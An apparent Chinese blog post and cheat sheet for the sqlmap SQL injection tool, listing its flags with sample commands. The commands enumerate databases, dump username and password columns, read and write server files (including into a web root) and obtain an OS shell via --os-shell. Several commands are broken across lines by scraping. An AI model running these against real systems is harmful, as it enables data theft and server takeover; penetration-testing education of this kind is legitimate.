SQL注入神器 sqlmap的常用引數 方法總結

2021-10-06 21:14:45 字數 2436 閱讀 6483

sqlmap是一款開源的自動化sql注入工具,是集獲取資料庫資訊、獲取主機許可權、讀寫檔案和提權等功能於一身的強大注入工具。

mysql

oracle

postgresql

microsoft sql server

microsoft access

ibm db2

sqlite

firebird

sybase

sap maxdb

布林的盲注——根據返回頁面判斷條件真假的注入

時間的盲注——用條件語句檢視時間延遲語句是否執行(即頁面返回時間是否增加)來判斷

報錯注入——把注入的語句的結果直接返回在錯誤資訊頁面中

聯合查詢注入——可以使用union的情況下的注入;

堆查詢注入——可以同時執行多條語句的執行時的注入。

獲取資料庫資訊:

-u 指定目標url

–dbs 列出所有的資料庫

–dbms 指定資料庫型別

–users 列出資料庫管理系統使用者

–current-db 列出當前資料庫

-d 選擇使用哪個資料庫

-t 選擇使用哪個表

-c 選擇使用哪個列

–tables 列出當前的表

–columns 列出當前的列

–dump 獲取欄位中的資料

–banner 檢索 banner

基本設定:

-d 連線資料庫

–cookie 新增cookie認證(當程式有防get注入的時候,可以使用cookie注入)

–user-agent 使用特定的瀏覽器使用者**

–os-shell 獲取主機shell

–thread 設定多執行緒(預設為3,最大為10)

–tamper 呼叫指令碼進行注入

–delay 設定多久訪問一次

-timeout 設定超時時間

-level 設定注入探測等級(1-5,預設1; 級別越高,檢測越全面)

-v 指定sqlmap的回顯等級(0-6,預設1)【「0」只顯示python錯誤以及嚴重的資訊;1同時顯示基本資訊和警告資訊(預設);「2」同時顯示debug資訊;「3」同時顯示注入的payload;「4」同時顯示http請求;「5」同時顯示http響應頭;「6」同時顯示http響應頁面】

讀寫檔案:

–file-read 讀取檔案(後面接本地要訪問的目標檔案)

–file-write 寫入檔案(後面接本地要寫入的檔案)

–file-dest 寫入檔案的絕對路徑(後面接要寫入目標主機的路徑)

讀寫檔案payload:

讀取linux伺服器的檔案:

sqlmap.py -u ""--

file

-read=

/etc/

1.txt

讀取windows伺服器的檔案:

sqlmap.py -u ""--

file

-read=d:

/1.txt

寫入本地檔案到伺服器上:

sqlmap.py -u ""--

file

-write /test/

1.txt -

-file

-dest /var/www/html/

1.txt

測試url是否存在注入:

sqlmap.py -u ""
列出資料庫使用者:

sqlmap.py -u ""

--users

列出資料庫所有庫名:

sqlmap.py -u ""

--dbs

檢視當前資料庫:

sqlmap.py -u ""

--current-db

檢視資料庫security中的表:

sqlmap.py -u ""

-d security -

-tables

檢視表users中的字段:

sqlmap.py -u ""

-d security -t users -

-columns

檢視欄位password,username的內容:

sqlmap.py -u ""

-d security -t users -c "password,username"

--dump

拿下伺服器shell:

sqlmap.py -u "" –os-shell

SQL注入神器 SqlMap

sqlmap是乙個開源的滲透測試工具,可以自動檢測和利用sql漏洞,並且在sectools.org注入工具中一直排名第一。sqlmap分配有乙個強大的搜尋引擎,如果url存在注入漏洞,它就可以從資料庫中直接提取資料,如果資料庫使用者許可權較大的話甚至可以直接執行作業系統的一些命令 讀取檔案。sqlm...

注入神器 sqlmap

01 注入原理 存在注入的原因是因為後台在編寫程式時,沒有對使用者輸入的資料做過濾導致的,正如事實上,不是所有的使用者都是友好的 比如 使用者在某個輸入框提交的引數是 2 瀏覽器提交的url為 http www.com index.php?id 2 伺服器後台執行sql語句 select from ...

SQL注入之Sqlmap使用

我們都知道,對於網路滲透最重要的一步是要拿到後台資料庫管理員的密碼與使用者名稱,那麼怎麼得到這個使用者名稱和密碼呢?就要用到今天所說的sqlmap,它不僅適用於內網環境,在外網環境也是非常受歡迎的,並且在kali linux裡邊顯得尤為重要,它所到之處幾乎是 寸草不生 那麼接下來我就簡單介紹下sql...